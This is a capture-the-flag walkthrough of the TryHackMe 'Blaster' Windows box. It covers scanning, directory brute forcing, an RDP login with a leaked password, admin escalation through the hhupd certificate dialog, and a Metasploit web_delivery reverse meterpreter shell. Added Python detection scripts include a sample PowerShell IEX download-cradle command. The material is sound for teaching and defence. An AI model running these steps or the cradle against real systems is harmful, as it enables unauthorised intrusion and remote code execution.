TryHackMe: Blaster

Walkthrough

Naman Jain
InfoSec Write-ups


Hi folks, today we are doing TryHackMe Blaster, which is a Windows machine rated as Easy.

Initials

export IP=10.10.184.13

Enumeration:

Let's start with port scanning. What I like to do is run rustscan first to find the open ports.

rustscan -a $IP --ulimit 5000

Now pass these ports to nmap for service and script scanning:

nmap -T4 -sC -sV -p80,3389 -oN nmap $IP -Pn

The results are

nmap_results.png

So we found 2 open ports, i.e. 80 (HTTP) and 3389 (RDP).
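The nmap command above writes its report in normal format (-oN). As an added example that is not part of the original write-up, the parser below pulls the port table out of such a report and checks the open services against an allow-list, which is how a defender would turn the same scan into an exposure check (for instance, RDP reachable where only HTTP is expected). The report text is constructed for the example, not the output captured on the box.

```python
"""Parse the port table of an nmap normal-format (-oN) report."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Set

# Constructed sample in the shape nmap -sC -sV -oN writes; not the real scan output.
# A filtered port is included to show that only "open" entries count as exposure.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.80 scan initiated as: nmap -T4 -sC -sV -oN nmap 10.10.184.13 -Pn
Nmap scan report for 10.10.184.13
Host is up (0.12s latency).

PORT     STATE    SERVICE       VERSION
80/tcp   open     http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open     ms-wbt-server Microsoft Terminal Services
445/tcp  filtered microsoft-ds
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# Nmap done -- 1 IP address (1 host up) scanned in 30.12 seconds
"""

# One port-table row: "<port>/<proto> <state> <service> [<version...>]".
# Script output rows start with "|" and never match.
PORT_LINE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(open\|filtered|open|closed|filtered)\s+(\S+)(?:\s+(.*))?$"
)


@dataclass(frozen=True)
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_normal(text: str) -> List[PortEntry]:
    """Return every port-table row of an -oN report, in file order."""
    entries: List[PortEntry] = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m is None:
            continue  # headers, blank lines and NSE script output
        port, proto, state, service, version = m.groups()
        entries.append(PortEntry(int(port), proto, state, service, (version or "").strip()))
    return entries


def open_ports(entries: Iterable[PortEntry]) -> List[int]:
    return [e.port for e in entries if e.state == "open"]


def unexpected_services(entries: Iterable[PortEntry], allowed: Set[str]) -> List[PortEntry]:
    """Open ports whose nmap service name is not on the allow-list.

    On a host that is only meant to serve a website, an open RDP port
    (ms-wbt-server) shows up here and should be firewalled or justified.
    """
    return [e for e in entries if e.state == "open" and e.service not in allowed]


if __name__ == "__main__":
    found = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    print("open:", open_ports(found))
    for entry in unexpected_services(found, allowed={"http", "https"}):
        print(f"unexpected: {entry.port}/{entry.proto} {entry.service} {entry.version}")
```

The allow-list is a per-host policy; the function only reports deviations, it does not decide what is acceptable.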

I checked port 80 (HTTP) first because we don't have any credentials for RDP.

http://$IP

It's a normal webpage, so I went for directory brute forcing and found /retro.

feroxbuster -u http://$IP -o feroscan.txt
feroxbuster_scan.png
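Directory brute forcing like the feroxbuster run above is very loud on the server side: one client produces a burst of 404 responses for paths nobody links to. As an added example, not part of the original write-up, the script below reads combined-format access-log lines and raises an alert for any client that exceeds a 404 threshold inside a sliding time window. The log lines, IP addresses and the scanner's User-Agent string are constructed for the example.

```python
"""Flag directory brute forcing in a web server access log (combined log format)."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, Optional

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def _line(ip: str, second: int, path: str, status: int, ua: str) -> str:
    # Constructed combined-format line; the date is arbitrary.
    return (f'{ip} - - [12/Aug/2020:10:00:{second:02d} +0000] "GET {path} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')


# Constructed sample log (documentation-range IPs): one ordinary visitor and one
# host walking a wordlist. The scanner UA is assumed; tools identify themselves
# unless the operator overrides the header, so never rely on the UA alone.
SCANNER, VISITOR = "203.0.113.7", "198.51.100.5"
SAMPLE_ACCESS_LOG: List[str] = [
    _line(VISITOR, 5, "/", 200, "Mozilla/5.0"),
    _line(VISITOR, 7, "/favicon.ico", 404, "Mozilla/5.0"),
]
for i in range(25):
    # guess 12 "hits" the /retro directory; every other guess is a 404
    path, status = ("/retro", 200) if i == 12 else (f"/guess-{i:02d}", 404)
    SAMPLE_ACCESS_LOG.append(_line(SCANNER, 20 + i, path, status, "feroxbuster/2.3.3"))


def parse_line(line: str) -> Optional[dict]:
    m = LOG_LINE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_bruteforce(lines: List[str], window_seconds: int = 60,
                      threshold: int = 20) -> Dict[str, Dict[str, int]]:
    """Per client IP that produced >= threshold 404s inside any window_seconds
    span: the peak 404 count seen in one window and the number of distinct
    paths it requested. Lines are expected in time order, as in a log file."""
    window = defaultdict(deque)   # ip -> timestamps of recent 404s
    paths = defaultdict(set)      # ip -> distinct requested paths
    alerts: Dict[str, Dict[str, int]] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        paths[ip].add(rec["path"])
        if rec["status"] != 404:
            continue
        q = window[ip]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()  # drop 404s that fell out of the window
        if len(q) >= threshold:
            peak = max(len(q), alerts.get(ip, {}).get("peak_404s", 0))
            alerts[ip] = {"peak_404s": peak, "distinct_paths": len(paths[ip])}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_ACCESS_LOG).items():
        print(f"{ip}: {info['peak_404s']} 404s in 60s over {info['distinct_paths']} paths")
```

The threshold and window are tuning knobs: a site with many broken links needs a higher threshold, and a slow scanner (feroxbuster can be rate-limited) needs a longer window. Pair the alert with the 200 responses from the same client to see which guesses actually found something, here /retro.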

Upon visiting,

So this is some kind of blogging website. While reading the blog posts, we found that a user had commented their password on one of the posts.

username_and_passowrd

User.txt

Now it's time to get user.txt. Log in via the RDP service; on Windows you can use the built-in RDP client, and on Linux there are many tools but I prefer rdesktop.

rdesktop $IP -g 50%

And on the desktop, we got the user flag.

userflag.png

PrivEsc:

To get a meterpreter shell, I tried some msfvenom payloads, but the AV keeps deleting the file. However, on the desktop next to user.txt there was another file named hhupd.

hhupd.png

I googled it and found an exploit which allows a normal user to run cmd as admin.

This video will help you understand it better :)

Now it's time for escalating privileges.

Run the hhupd application as administrator, and check the publisher certificate.

publisher certificate.png

Now click on the link and a webpage will open. Save the webpage (ignore the error about the internet not working).

CTRL+S

Navigate to cmd.exe in the save dialog, or simply type cmd in the bar at the top.

navigate to cmd

Hit enter and cmd will open as Admin.

admin cmd

Now get the admin flag.

admin flag

Post Exploitation:

There are also some post-exploitation tasks, so let's do those too.

Since the AV is enabled, we cannot get an admin shell via msfvenom.

Now we can use Web Delivery; it's a Metasploit module for getting a shell from a shell (kinda :p).

msf> use exploit/multi/script/web_delivery

We will use the payload as normal:

windows/meterpreter/reverse_tcp

And set the target to PowerShell, as we are getting the shell via PowerShell.

Set the other details such as LHOST, LPORT, etc. Now we are good to go.

Run the exploit and copy the result.

web delivery result

Paste this into the Windows admin cmd.

If copy-pasting from your system into the RDP session isn't working, you can save the command on your local machine, host it with a Python web server, and then copy and paste it from inside the RDP session.

And we got the admin meterpreter shell.

meterpreter shell
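Both the privilege escalation (a browser opened from the certificate dialog ends up launching cmd as admin) and the Web Delivery stager (a PowerShell one-liner that downloads and runs code in memory, which is why the AV that deleted the msfvenom file never sees a file) leave a clear trace in process-creation telemetry. As an added example, not part of the original write-up, the script below applies two triage rules to Sysmon-style process events: a shell started by a browser process with an elevated integrity level, and a PowerShell command line carrying several download-cradle indicators. The event records, user names, browser list and the cradle command line are constructed assumptions; the field names (Image, ParentImage, CommandLine, User, IntegrityLevel) mirror Sysmon Event ID 1.

```python
"""Triage rules over process-creation events for the two techniques in this write-up."""
import re
from typing import Dict, List

# Constructed events in the shape of Sysmon Event ID 1 fields. Hostnames, users
# and the cradle URL (documentation-range IP) are placeholders, not from the box.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe", "User": r"WORKSTATION\lowpriv", "IntegrityLevel": "Medium"},
    # Browser launched from an elevated dialog spawning a shell: the privesc pattern.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": "cmd.exe", "User": r"NT AUTHORITY\SYSTEM", "IntegrityLevel": "System"},
    # In-memory download cradle of the kind a web_delivery PowerShell target hands out.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient)"
                    ".downloadstring('http://192.0.2.10:8080/stage'))\"",
     "User": r"NT AUTHORITY\SYSTEM", "IntegrityLevel": "System"},
    # Benign scheduled script: one weak indicator (hidden window) is not enough.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -w hidden -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1",
     "User": r"WORKSTATION\svc_backup", "IntegrityLevel": "High"},
]

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}  # assumed list
SHELLS = {"cmd.exe", "powershell.exe"}
ELEVATED = {"High", "System"}

# Indicator name -> pattern. Each is individually common; several together are not.
CRADLE_INDICATORS = [
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("web download", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("no profile", re.compile(r"-nop\b|-noprofile", re.I)),
    ("encoded command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def browser_spawned_elevated_shell(ev: Dict[str, str]) -> bool:
    """A browser should never be the parent of an elevated cmd/powershell."""
    return (basename(ev["ParentImage"]) in BROWSERS
            and basename(ev["Image"]) in SHELLS
            and ev["IntegrityLevel"] in ELEVATED)


def cradle_indicators(cmdline: str) -> List[str]:
    return [name for name, rx in CRADLE_INDICATORS if rx.search(cmdline)]


def triage(events: List[Dict[str, str]], min_indicators: int = 2) -> List[Dict]:
    """Return one finding per event that trips a rule, in event order."""
    findings: List[Dict] = []
    for idx, ev in enumerate(events):
        if browser_spawned_elevated_shell(ev):
            findings.append({"event": idx, "rule": "browser_spawned_elevated_shell",
                             "user": ev["User"]})
        if basename(ev["Image"]) == "powershell.exe":
            hits = cradle_indicators(ev["CommandLine"])
            if len(hits) >= min_indicators:
                findings.append({"event": idx, "rule": "powershell_download_cradle",
                                 "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The indicator count, not any single keyword, drives the cradle rule, so the backup script with only a hidden window passes while the stager with IEX, a WebClient download, a hidden window and no profile is flagged. Command-line logging for process creation (Sysmon, or Windows audit policy with command-line auditing enabled) is what makes the second rule possible at all.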

So with this, we have successfully exploited Blaster. Thanks for reading; I hope you found it useful. For any doubts you can DM me on Twitter.

Bye, and I'll see you in the next blog.
